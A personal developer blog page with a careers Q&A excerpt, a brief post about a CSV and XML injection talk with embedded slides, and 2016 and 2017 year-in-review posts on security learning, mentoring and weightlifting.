<li>Making sure our software is building correctly with our Continuous Integration / Deployment servers</li>
<li>Fixing bugs</li>
<li>Reading and/or understanding other people’s code</li>
<li>Reviewing teammates code</li>
<li>Communicating with other team members around new features, existing features, bugs, schedule, etc.</li>
</ul>


<p><strong>Q: How do you keep current on this industry?</strong><br>
A: Typically through the technical websites I follow, local industry groups (like calsec, yycruby), and peers</p>

<p><strong>Q: Best program languages to learn at the moment? And Why?</strong><br>
A: For server side I’ve been hearing a lot of good things about Golang. And Javascript/NodeJS is huge right
now, if the buzz of the internet is to be trusted.  I barely know either so it’s purely speculation on my part.</p>

<p>My primary language is Ruby, and that will keep me employed for the next 5 years at least, however I’ve heard anecdotally of it’s decline in favour of the aforementioned languages.
I haven’t seen that personally, but I am also keeping that in mind and am assuming I will likely need to learn a different language within the next 5 years.</p>

<p><strong>Q: What is your input when it comes to learning languages? Is it good to learn basics of multiple language or master in one?</strong><br>
A: Personally, my recommendation is to learn one language really well, and know how to apply that knowledge to other languages. IMO a developer that knows the fundamentals can
get up and running in a language with a few weeks of study. Being able to solve problems with code > knowing a particular language.</p>

<p>That said, I’ve also “levelled up” my skill in languages the most when I’ve started working in another language. For example, I didn’t grok blocks in ruby until I worked with
objective-c and saw how it used blocks programming on the iPhone. I’ve heard that is a common situation. So maybe my answer is do both.</p>

<p>I would recommend learning different platforms. Programming server code, vs UI code, vs mobile code all come with very different perspectives and cause you to learn design
paradigms that are applicable to all software.</p>

<p><strong>Q: What is the best way to show case your work for employers or what is the best way to create a portfolio?</strong><br>
A: Ship it. Get something on an app store that an employer can download to their phone, or load on a website. I am 100% more interested in a piece of working
software then a theoretical piece of software that you’ve written when we sit down for an interview. At a recent career fair, I had someone offer to demonstrate their Android
app that they built (it was just a weather app). It was an excellent opportunity to talk about them and their coding and see how that person thought. We talked about APIs, UI
programming, and failover conditions. It was a great discussion and I now know that this person is a capable software developer. Their resume went to the top of the pile.</p>
</div>
  
  



      
        

      
    </article>
  
    
    <article>
      
  <header>
    
      <h1 class="entry-title"><a href="/2018/injection-security-presentation/">CSV & XML Injections - YYCRuby Presentation</a></h1>
    
    

<span class="categories">
  
    <a class='category' href='/categories/presentations/'>presentations</a>, <a class='category' href='/categories/rails/'>rails</a>, <a class='category' href='/categories/ruby/'>ruby</a>, <a class='category' href='/categories/secuirty/'>secuirty</a>
  
</span>


    
      <p class="meta">
        
      </p>
    
  </header>


  <div class="entry-content"><p>This month I had the wonderful opportunity to speak again in front of the YYCRuby meetup group in calgary. The presentation covered CSV and XML injection attacks, and for me the highlight was popping a shell on a windows vm using CSV injection. <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/hurtrealbad.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="hurtrealbad">
              hurtrealbad
              </span>
            </span>
          </p>

<p>You can view the slides below:</p>

<script async class="speakerdeck-embed" data-id="3958d6b67d6448dba439e7612bc81218" data-ratio="1.33333333333333" src="//speakerdeck.com/assets/embed.js"></script>

</div>
  
  



      
        

      
    </article>
  
    
    <article>
      
  <header>
    
      <h1 class="entry-title"><a href="/2017/2017-year-in-review/">2017 Year in Review</a></h1>
    
    

<span class="categories">
  
    <a class='category' href='/categories/meta/'>meta</a>, <a class='category' href='/categories/other/'>other</a>
  
</span>


    
      <p class="meta">
        
      </p>
    
  </header>


  <div class="entry-content"><p>Hello! This is the second installment of my year in review &ldquo;series&rdquo;. <a href="/2017/2016-year-in-review/">Last year</a>
I did a year in review and found it to be very beneficial and so the tradition continues.</p>

<h1>Blog / Community</h1>

<p>My goals for 2017 centered around a few items: finishing an ebook info product, writing on the blog, and
mentoring with Chic Geek.</p>

<p>The idea for the ebook was to create something based on my experience in Ruby &amp; Security.
This did not happen. I started working on the project and came to the realization that I
didn&rsquo;t want to do an info product. My heart wasn&rsquo;t there and I killed the goal!</p>

<p>The second bit of work that I wanted to accomplish was writing more for the blog. This also did not happen.
Primarily there was no info product to write for and therefore not a lot of
motivation to dig up new material for blogging. As well, very little major Ruby related work landed on my
plate at work so there were minimal new ideas / material to write about.</p>

<p>Both of the above can feel like failures if I let them. But upon reflection I realize they weren&rsquo;t things
I wanted to do. And I&rsquo;m okay with not doing something for the sake of meeting a goal. There is a quote from
the book <a href="https://www.mentalmanagementstore.com/product/with-winning-in-mind/">With Winning in Mind</a> that
applies to this situation:</p>

<blockquote><p>if you trade up to a new goal in the process of working toward a goal, the first goal has completed its
purpose!</p></blockquote>

<p>In this case, I killed two goals that allowed me to pickup a new goal (more on that later). To me that is a
success.</p>

<p>My final goal from last year was to mentor with <a href="https://www.thechicgeek.ca/">Chic Geek</a>. I had a fantastic
mentee this year. My mentee made it her goal to get a job as a software dev. We worked on researching
companies, polishing her resume, practicing for interviews,
and working on a portfolio project. It was a very rewarding experience for both of us
and my mentee hit her goal and landed a job in town. I was very proud of how hard my mentee worked and
that she was able to accomplish her goal.</p>

<h3>Goals</h3>

<p>For this next year I&rsquo;ve changed the community and blog related goals to be a little more focused on side
projects:</p>

<ul>
<li>Prototype App &ndash; A friend of mine has asked me to help him build a prototype Augmented Reality app to use
for grant hunting. I like his idea and think I can spin him something quickly.</li>
<li>Launch a SaaS &ndash; I&rsquo;ve got an idea that is approximately 40% implemented that I started last year. I&rsquo;ve done
a proof of concept and want to productize this app. I&rsquo;ll write further about it as this
materializes more.</li>
<li>Present at the ruby meetup group on security &ndash; I&rsquo;ve got a few ideas lined up that should fall into place.</li>
<li>A blog post or two &ndash; One would be on the security ideas I have in mind, the other on some of
the things I&rsquo;ve learned at work in the last few weeks of 2017. We&rsquo;ll see what the rest of the year holds.</li>
</ul>


<h1>Work / Security</h1>

<p>Last year I had focused my work / security goals towards learning more about reverse engineering. There are
two coleagues at work that I talk to about this topic and I enjoy every minute of it. As part of my
goals last year, I decided to take a course on reverse engineering. I was lucky enough that these two
colleagues were writing a course for SAIT on Malware Analysis and I was able to beta test it for them. It
was a rare opportunity and I learned a lot from the course.</p>

<p>By taking the malware reversal course, I learned that I enjoy reading and discussing the topic of malware,
but don&rsquo;t enjoy the act of reversing malware as much. Which means that I was able to
kill my goal of doing a full CTF.</p>

<p>I also learned during the year that I am more interested in web based security. I had the
opportunity to attend an internal Cisco training course called <code>r00tcamp</code>. In the course,
I was able to explore different types of web exploits &ndash; some I was familiar with, others I wasn&rsquo;t &ndash; and also
work on a web based CTF. As part of r00tcamp I was given time to
find exploits in our product. I found a handful of security bugs (some major, some minor)
 which was a big win. And I now know that web based security is what I enjoy the most!</p>

<p>I had made the goal to complete a responsible disclosure last year and I am happy to report that I was
successful doing this <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/unicode/1f604.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="smile">
              smile
              </span>
            </span>
           I submitted a security bug report
through <a href="https://www.hackerone.com/">Hacker One</a>, but unfortunately I didn&rsquo;t get a bounty for it <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/unicode/1f61e.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="disappointed">
              disappointed
              </span>
            </span>
          
At least I can check off that I accomplished my goal in this area. <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/unicode/2705.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="white_check_mark">
              white_check_mark
              </span>
            </span>
          </p>

<p>One additional piece of training that I was also able to take advantage of this year was <code>CCENT</code>. One of my
co-workers teaches a CCENT course locally, and offered the training up to the Calgary office.
By crossing out my info product &amp; blogging related goals, I was able to make the time to go
through the course. I learned a great deal about networking and feel like I have a solid grasp on
networking fundamentals.</p>

<h3>Goals</h3>

<p>My goals for this year are focused around bug bounties &amp; web security testing:</p>

<ul>
<li>Achieve work goals related to pentesting &ndash; I&rsquo;ve setup a reading material and security training plan
at work and finishing even half of that would be a huge win.</li>
<li>Complete the <a href="https://google-gruyere.appspot.com/#0__hackers">Gruyere &ldquo;CTF&rdquo;</a> &ndash; this will be good practice
for doing real bug bounties.</li>
<li>Submit a bug and receive a bug bounty &ndash; Knowledge application!</li>
<li>Submit 5 bug bounties (stretch goal) &ndash; <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/allthethings.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="allthethings">
              allthethings
              </span>
            </span>
           Knowledge application!</li>
<li>Finish crypto-pals (stretch goal) &ndash; this isn&rsquo;t super high on the priority list, but getting more
exposure to how crypto works is beneficial, especially with the Internet taking an HTTPS everywhere direction.
There is going to be a lot of opportunity for exploiting incorrectly done crypto.</li>
</ul>


<h1>Weightlifting</h1>

<p>Weightlifting did not go as planned this year. Let&rsquo;s start with the numbers:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>               | 2017 |  2017  |      |
</span><span class='line'>               | Goal | Actual | diff |
</span><span class='line'>--------------------------------------|
</span><span class='line'>Snatch         |  165 |  140   | -25  |
</span><span class='line'>Squat Clean    |  245 |  200   | -45  |
</span><span class='line'>Split Jerk     |  200 |  195   | -5   |
</span><span class='line'>Clean & Jerk   |  200 |  195   | -5   |
</span><span class='line'>Front Squat    |  265 |  215   | -50  |
</span><span class='line'>Back Squat     |  315 |  240   | -75  |
</span><span class='line'>Push Press     |  165 |  175   | +10  |
</span><span class='line'>Strict Press   |  135 |  135   |  0   |
</span><span class='line'>Bench          |  225 |  185   | -40  |
</span><span class='line'>Deadlift       |  400 |  340   | -60  |
</span><span class='line'>Overhead Squat |  185 |  165   | -20  |
</span><span class='line'>BS + DL + BP   |  940 |  765   | -175 |</span></code></pre></td></tr></table></div></figure>


<p>My presses &amp; jerk went according to plan and I&rsquo;m jerking above bodyweight <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/success.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="success">
              success
              </span>
            </span>
          
However my squats, deadlift, and olympic lifts did not. In fact, many of these numbers did not change
from 2017. This happened for a number of reasons:</p>

<ol>
<li>Family</li>
<li>Training Plan</li>
<li>Injury</li>
</ol>


<p>Let&rsquo;s start with the family reason. This little guy decided to enter the Miller family:</p>

<p><img src="/images/2017-review/maxwell.jpg" alt="Max Miller" /></p>

<p>My son Maxwell was born in June and he is an absolute joy (he&rsquo;s the one on the right.)
Anyone with a newborn will tell you one of the
first things to go is sleep. And if you&rsquo;ve done any weightlifting, you know that sleep is a must.
This large change affected my training and weightlifting (no surprise there, or disappointment, our
kiddo is amazing!)</p>

<p>The second reason that my weightlifting didn&rsquo;t go as planned was that my training plan didn&rsquo;t align with my goals.
I had wanted to do a few weightlifting cycles like last year, but they never happened. I got
distracted by the CrossFit Open, then distracted again with some other &ldquo;nice to have&rdquo; goals. All of a sudden
it was December and I realized I had done nothing to hit my numbers. Oops!</p>

<p>I&rsquo;ve already made changes to my programming to better align myself with my training goals, and have changed
my focus away from CrossFit to exclusively weight training. I&rsquo;m confident that this alone will help to
hit my numbers this year.</p>

<p>The final reason for not hitting my numbers was injury. Around the time Maxwell was born I started to
have pain in my left hip, especially when squatting. After a bit of diagnosing it turns out that
bad mechanics were to blame. My hip flexors &amp; quads were so tight they were having an affect on my hip socket
and in turn causing pain in hip based movements (which is the majority of movements.) <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/unicode/1f4a5.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="collision">
              collision
              </span>
            </span>
          </p>

<p>It has taken me around 2 months to be pain free in my hip, and has been another month of rehab to fix my squat
mechanics. There is still a long way to go and my squat is nowhere near fixed yet. I&rsquo;ve only begun
squatting with load this month and at a faction of what I&rsquo;m capable of. Injury sucks and it is going
to impact my goals for 2018.</p>

<h3>Goals</h3>

<p>This year I&rsquo;ve set reasonable expectations for my goals, and a big stretch goal in the event that
everything goes exceptionally well. My primary goal is fixing my squat. Without that working, everything
else doesn&rsquo;t matter.</p>

<p>If my squat is on track, my next set of goals revolve around hitting a 50 percentile against <a href="http://beyondthewhiteboard.com/">Beyond the
Whiteboard</a>. I use BTWB to track my lifts and it represents roughly what the
CrossFit population is capable of. I&rsquo;ve been <code>&gt; 50</code> for everything but powerlifts &amp; olympic lifts for awhile
and this has been the catalyst to lift seriously. Translated into weights that
looks like:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>               |         | 2018 |      |
</span><span class='line'>               | Current | Goal | Diff |
</span><span class='line'>---------------------------------------|
</span><span class='line'>Snatch         |   140   |  145 | +5   |
</span><span class='line'>Squat Clean    |   200   |  205 | +5   |
</span><span class='line'>Split Jerk     |   195   |  200 | +5   |
</span><span class='line'>Clean & Jerk   |   195   |  200 | +5   |
</span><span class='line'>Back Squat     |   240   |  285 | +45  |
</span><span class='line'>Strict Press   |   135   |  145 | +10  |
</span><span class='line'>Bench          |   185   |  225 | +40  |
</span><span class='line'>Deadlift       |   340   |  355 | +15  |
</span><span class='line'>BS + DL + BP   |   765   |  865 | +100 |</span></code></pre></td></tr></table></div></figure>


<p>These numbers are less ambitious than last years numbers.</p>

<p>To that end, I&rsquo;ve setup a second goal
if I hit the above numbers before the end of the year. That goal is to align my ratios against an
&ldquo;ideal athlete&rdquo;. This is the idea that using the backsquat as a base measure, different lifts should be a
certain percentage of the backsquat. I&rsquo;d need to hit the following numbers to meet that goal:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>               |         | 2018 |      |
</span><span class='line'>               | Current | Goal | Diff |
</span><span class='line'>---------------------------------------|
</span><span class='line'>Snatch         |  140    |  190 | +50  |
</span><span class='line'>Squat Clean    |  200    |  235 | +35  |
</span><span class='line'>Split Jerk     |  195    |  240 | +45  |
</span><span class='line'>Clean & Jerk   |  195    |  230 | +35  |
</span><span class='line'>Push Press     |  175    |  185 | +10  |
</span><span class='line'>Front Squat    |  215    |  245 | +30  |</span></code></pre></td></tr></table></div></figure>


<p>Some of these numbers are pretty crazy given where I am now. And being able to add 45# to a split jerk, or
50# to my snatch in a year would be amazing.</p>
</div>
  
  



      
    </article>
  
    
    <article>
      
  <header>
    
      <h1 class="entry-title"><a href="/2017/2016-year-in-review/">2016 Year in Review</a></h1>
    
    

<span class="categories">
  
    <a class='category' href='/categories/meta/'>meta</a>, <a class='category' href='/categories/other/'>other</a>
  
</span>


    
      <p class="meta">
        
      </p>
    
  </header>


  <div class="entry-content"><p>Hi &ndash; I&rsquo;m Gavin Miller and you&rsquo;ve landed on the 2016 year in review. This is the first year that I&rsquo;ve decided to
write a retrospective style blog post. At the end of 2016 my boss asked me to do one for work and I
was astounded to see the things I had accomplished, and the progress that our team had made for the
year. To that end, I&rsquo;m hoping to gain the same perspective on other areas in my life.</p>

<h1>Blog / Community</h1>

<p>This is the section that&rsquo;s probably most relevant to readers of this blog. 2016 was a bit less than equal
to 2015 for blogging material. In total I wrote 3 blog posts on the topic of ruby/rails security. I find these
posts take approximately 10-15 hours of time to do, due to the research, verification, and testing of the
posts.</p>

<p>One of the best posts I wrote this year was <a href="/2016/a-tale-of-security-gone-wrong">A Tale of Security Gone Wrong</a>.
It received more Internet points than other things I have written. It was a fun post to write and materialized from the
presentations I gave for the local <a href="/2016/ruby-rails-security-presentation/">yycruby</a> &amp;
<a href="/2016/security-for-js-devs-presentation/">yycjs</a> groups.</p>

<p>The second big writing accomplishment for the year was releasing the
<a href="https://www.getdrip.com/forms/88066895/submissions/new">Improve Rails Security in 5 Days</a> email course. I wrote
this when I switched from MailChimp for email newsletters to Drip. The purpose of this was to have a
solid platform to launch an ebook from &mdash; more on that to come.</p>

<p>As I mentioned, I spent the beginning of the year doing a series of security presentations at local meetup groups.
This was a lot of fun, and I can certainly see giving other presentations like this again in the future. It was
also a real eye-opener. I don&rsquo;t consider myself to be <em>that</em> knowledgeable when it comes to security (hello imposter
syndrome), but these presentations highlighted how cursory many developer&rsquo;s security knowledge is. I believe
there&rsquo;s many valuable resources that can be written for the intersection of &ldquo;Secure Programming&rdquo; and &ldquo;Language X&rdquo;.</p>

<p>To that end, I&rsquo;ve begun to write one of those resources. I&rsquo;ll keep details pretty sparse for now. This has been
an idea on the back burner for some time. I had a bit of momentum on the project at the beginning of 2016, but
then summer came and I completely checked out from wanting to do anything on the computer.</p>

<p>My final community accomplishment for 2016 was being a mentor for <a href="http://www.thechicgeek.ca/">Chic Geek</a>. I am
a big fan of Chic Geek and Kylie who runs the organization. They are doing amazing things in Calgary
to promote technology as a viable field for women. My mentee was able to work through some difficult problems
over the course of our mentorship, and I grew as a mentor.</p>

<h3>Goals</h3>

<p>For 2017 I have set the following goals:</p>

<ul>
<li>Finish ebook &ndash; this is a matter of putting one foot in front of the other and doing the hard work. I&rsquo;ve already
got a solid topical foundation and a rough sketch of what the book will be. Now I just have to execute on that!</li>
<li>4 substantial blog posts &ndash; These spill out naturally when I hit interesting topics in my day job.</li>
<li>Mentor with Chic Geek &ndash; I had such a great time doing this last year that I want to make sure it happens again
this year!</li>
</ul>


<h1>Work</h1>

<p>2016 was an exciting year for me at Cisco. One I enjoyed tremendously. I&rsquo;ve often thought that anyone can
become productive in a system very quickly if they&rsquo;re a good programmer. However, <strong>I&rsquo;ve come to recognize that
context takes a long time to build and depending on the nature of the role that is vastly more important to
getting things done than sheer effort / skill / ability.</strong></p>

<p>It was around the beginning of the year I actually started to get my footing in my role with enough context
to have an impact on my team&rsquo;s work. It was during this time that I began to refactor the build system
for our project and move it onto GoCD. We were hitting occasional errors with builds and they were deeply
dependent on institutional knowledge (details in only a few people&rsquo;s heads) that wasn&rsquo;t codified. Turn around
was about a month on this project to start seeing tangible results in the build system. Eventually our
team moved from a once every few days build model to daily builds. It has allow QA to build a regression
testing suite into our builds which has saved everyone time and effort. Three cheers for CI/CD pipelines!</p>

<p>I was lucky enough to wiggle into my role at Cisco with limited Linux knowledge. This means that I&rsquo;ve had to
learn the linux domain on the fly, which has been painful at times, because you don&rsquo;t know what you don&rsquo;t know.
Throughout this year I&rsquo;ve ended up using a ton of utilities to analyze, diagnose, and fix bugs in our codebase.
Just a few of the tools/systems that I&rsquo;ve learned: <code>grub</code>, <code>lvm</code>, <code>dd</code>, <code>rpm</code>, <code>yum</code>, <code>ldd</code>. In addition to
this I&rsquo;ve also learned a ton about compiling programs from source, and how linking and pathing works for many
open source software products. At the beginning of the year, I would have struggled to compile something like
<code>Ruby</code>, <code>Python</code>, <code>Erlang</code>, or <code>Perl</code> from source. I&rsquo;ve now compiled, recompiled, and configured all of those
packages multiple times.</p>

<p>One of the other benefits of being at Cisco is being exposed to a boat-ton of smart people. And
these people are in vastly different roles than mine. Part of that intersection came when Cisco held an internal
CTF competition this year. I picked the lowest point value (easiest) reverse engineering task and made it my
mission to solve it. I used stack diagrams, <code>gdb</code>, <code>hopper</code>, <code>ida pro</code>, and other tools all in the effort to find
a flag. And <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/success.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="success">
              success
              </span>
            </span>
           <a href="https://twitter.com/gavingmiller/status/795676516248068096">I found the flag</a>!</p>

<h3>Goals</h3>

<ul>
<li>Blog about non-ruby topics &ndash; I&rsquo;ve accrued a fair amount of knowledge outside of Ruby as it relates to the tools
I use daily. I&rsquo;d like to write at least two blog posts on this experience. Namely: GoCD, and compiling from source.</li>
<li>Take a course/training on Reverse Engineering &ndash; I enjoyed disassembling code, and using the many tools
to interact with source in the CTF competition. I&rsquo;d like to build those skills more!</li>
<li>Complete a full CTF &ndash; To dovetail / compliment learning about RE, I&rsquo;d like to apply those skills in a CTF. There
are a few archived CTF&rsquo;s that I&rsquo;ve saved that I&rsquo;ll take the time to go through and solve.</li>
<li>Complete a responsible disclosure &ndash; This one is a stretch goal. It&rsquo;s one thing to write about protecting
ruby, and it&rsquo;s a total other thing to actually exploit a live system. <a href="https://hackerone.com">Hacker One has an easy and ethical platform</a>
to do this from and I&rsquo;d like to try my hand at it.</li>
</ul>


<h1>Weightlifting</h1>

<p>Towards the middle of this year &mdash; June &mdash; I began to dial in and focus on my weightlifting.
I&rsquo;ve been doing CrossFit for the last 5 or so years, and I was getting frustrated that I wasn&rsquo;t seeing enough
progression on my olympic lifts. I talked to my coach at <a href="http://crossfitmost.com/">Most</a>, and she suggested
I do a strength cycle, and focus on nutrition. So we did.</p>

<p>I started with a simple program of eating at calorie surplus and tracking macros: Carbs, Fat, and Protein.
This was the first time I had ever done a bulk, otherwise I had mostly kept to &ldquo;eating healthy.&rdquo; <strong>The
thing is, if you don&rsquo;t keep track of what you&rsquo;re eating, it&rsquo;s hard to tell wether you&rsquo;re healthy or not.</strong>
It became immediately apparent that I wasn&rsquo;t regularly eating enough to build muscle. The program quickly fixed that!
Over the course of 7 months I went from 160lbs to 190lbs &mdash; a 30lbs gain. It was very gradual as can be seen
from the graph below:</p>

<p><img src="/images/2016-review/bulking.png" alt="20lbs weight gain over 6 months" /></p>

<p>As part of my eating, I did two strength cycles. The first one was a month long, and the second one lasted
two months. The majority of the strength cycles focused on legs: Deadlift, Front Squat, Back Squat, etc. With
some occasional upper body work. And it was also all tempo work. If you&rsquo;re not familiar with tempo lifts it&rsquo;s
where you slow down the eccentric or concentric portion of a movement (I think typically during
eccentric, and then driving strongly during concentric for power generation is the typical tempo setup.)</p>

<p>In that period of time I saw a huge increase in my squats and deadlift. While I saw improvements in clean &amp; jerk
and snatch, they weren&rsquo;t as high as I had hoped. Towards the end of 2016 it felt like I was on the cusp of hitting
a breakthrough on technique for both of these lifts. Overall between the end of
2015 to the end of 2016 my numbers looked like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>Year end #s    | 2015 | 2016 |
</span><span class='line'>------------------------------
</span><span class='line'>Snatch         |  115 |  135 |
</span><span class='line'>Squat Clean    |  156 |  200 |
</span><span class='line'>Split Jerk     |  165 |  175 |
</span><span class='line'>Clean & Jerk   |  165 |  175 |
</span><span class='line'>Front Squat    |  177 |  215 |
</span><span class='line'>Back Squat     |  215 |  240 |
</span><span class='line'>Push Press     |  125 |  145 |
</span><span class='line'>Strict Press   |  105 |  115 |
</span><span class='line'>Bench Press    |  153 |  175 |
</span><span class='line'>Deadlift       |  285 |  340 |
</span><span class='line'>Overhead Squat |  119 |  150 |
</span><span class='line'>BS + DL + BP   |  644 |  755 |</span></code></pre></td></tr></table></div></figure>


<p>Additionally as part of my strength cycle I participated in a mini-powerlifting competition at
my gym. It was a great time and I put up my max squat, deadlift, and bench press numbers for 2016.
Here&rsquo;s a picture of the 340lbs deadlift:</p>

<p><img src="/images/2016-review/powerlifting-comp.jpg" alt="Gavin Miller Deadlifting 340lbs" /></p>

<h3>Goals</h3>

<p>For 2017 I&rsquo;ve set the following goals for myself:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>               | 2015 | 2016 | 2017 | diff |
</span><span class='line'>-------------------------------------------|
</span><span class='line'>Snatch         |  115 |  135 |  165 |  +30 |
</span><span class='line'>Squat Clean    |  156 |  200 |  245 |  +45 |
</span><span class='line'>Split Jerk     |  165 |  175 |  200 |  +25 |
</span><span class='line'>Clean & Jerk   |  165 |  175 |  200 |  +25 |
</span><span class='line'>Front Squat    |  177 |  215 |  265 |  +50 |
</span><span class='line'>Back Squat     |  215 |  240 |  315 |  +75 |
</span><span class='line'>Push Press     |  125 |  145 |  165 |  +20 |
</span><span class='line'>Strict Press   |  105 |  115 |  135 |  +20 |
</span><span class='line'>Bench          |  153 |  175 |  225 |  +50 |
</span><span class='line'>Deadlift       |  285 |  340 |  400 |  +60 |
</span><span class='line'>Overhead Squat |  119 |  150 |  185 |  +35 |
</span><span class='line'>BS + DL + BP   |  644 |  755 |  940 | +175 |</span></code></pre></td></tr></table></div></figure>


<p>My pressing goals are approximately a 20lbs increase. My bench is much lower than it should be and I feel
like a few pressing cycles can see a 50lbs increase. I&rsquo;d also like to do two more leg cycles which I feel would
bring increases in front squat, back squat, and deadlift. And finally the olympic lifts benefit from increases
in upper body, and lower body strength cycles so hopefully those lifts increase as well!</p>

<p>For bodyweight I&rsquo;d like to maintain between 180lbs &ndash; 190lbs of lean body mass. I&rsquo;m not sure if I&rsquo;m ready for
more than that &hellip; yet <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/unicode/1f609.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="wink">
              wink
              </span>
            </span>
          </p>
</div>
  
  



      
    </article>
  

  <div class="pagination">
    
      <a class="prev" href="/page/2/">&larr; Older</a>
    
    <a href="/archives">Blog Archives</a>
    
  </div>
</div>

<aside class="sidebar">
  
    <section class="vcard">
  <h1>Hi, I&#8217;m <span class="fn">Gavin Miller</span></h1>
  <img alt="Gavin Miller" src="https://secure.gravatar.com/avatar/8f75007bcbcb8ba4daa408592e1c65ec?s=246" class="photo" />
  <p class="clearfix">
  <p>Hi, I&#8217;m Gavin Miller. I&#8217;m an app dev focused on Security within Ruby and Rails.</p>
  <p>This blog is focused on security (with occasional tangents.) You&#8217;ll find this blog interesting if you&#8217;re growing your knowledge of security and best practices in Ruby or Rails.</p>
  <p><a href="https://twitter.com/gavingmiller">Follow Me on Twitter</a></p>
  <p><a href="/about">More About Me</a></p>
</section>
<section>
  <h1>Recent Posts</h1>
  <ul id="recent_posts">
    
      <li class="post">
        <a href="/2020/how-i-mitmd-rubygems-org-kinda/">How I MITM&#8217;d rubygems.org &#8230; Kinda</a>
      </li>
    
      <li class="post">
        <a href="/2020/interview-with-a-first-year-computer-science-student/">Interview With a First Year Computer Science Student</a>
      </li>
    
      <li class="post">
        <a href="/2018/injection-security-presentation/">CSV & XML Injections - YYCRuby Presentation</a>
      </li>
    
      <li class="post">
        <a href="/2017/2017-year-in-review/">2017 Year in Review</a>
      </li>
    
      <li class="post">
        <a href="/2017/2016-year-in-review/">2016 Year in Review</a>
      </li>
    
  </ul>
</section>
  
</aside>

    </div>
  </div>
  <footer role="contentinfo"><p>
<!-- Copyright &copy; 2009 - 2020 - Gavin Miller -->
</p>
</footer>
  <script src="/javascripts/modernizr-2.0.js" defer></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script>!window.jQuery && document.write(unescape('%3Cscript src="/javascripts/libs/jquery.min.js"%3E%3C/script%3E'))</script>
<script src="/javascripts/octopress.min.js" type="text/javascript" defer></script>

<script async>
var adBlockEnabled = false;
var testAd = document.createElement('div');
testAd.innerHTML = '&nbsp;';
testAd.className = 'adsbox';
document.body.appendChild(testAd);
window.setTimeout(function() {
  if (testAd.offsetHeight === 0) {
    // In the event that you're reading this code, I'm tracking ad blockers used on this
    // site to determine if I can pull off the stupid social media buttons from the bottom
    // of my pages. If the majority of users are blocking them, then there's no point in
    // showing them!
    // Maybe I should just pull off the social media buttons anyway ... *goes away thinking*
    if(typeof _gaq !=='undefined'){
      _gaq.push(['_trackEvent', 'Blocking Ads', 'true']);
    }
  }
  testAd.remove();
}, 100);
</script>








<script type="text/javascript" src="https://d389zggrogs7qo.cloudfront.net/js/button.js" defer></script>






</body>
</html>
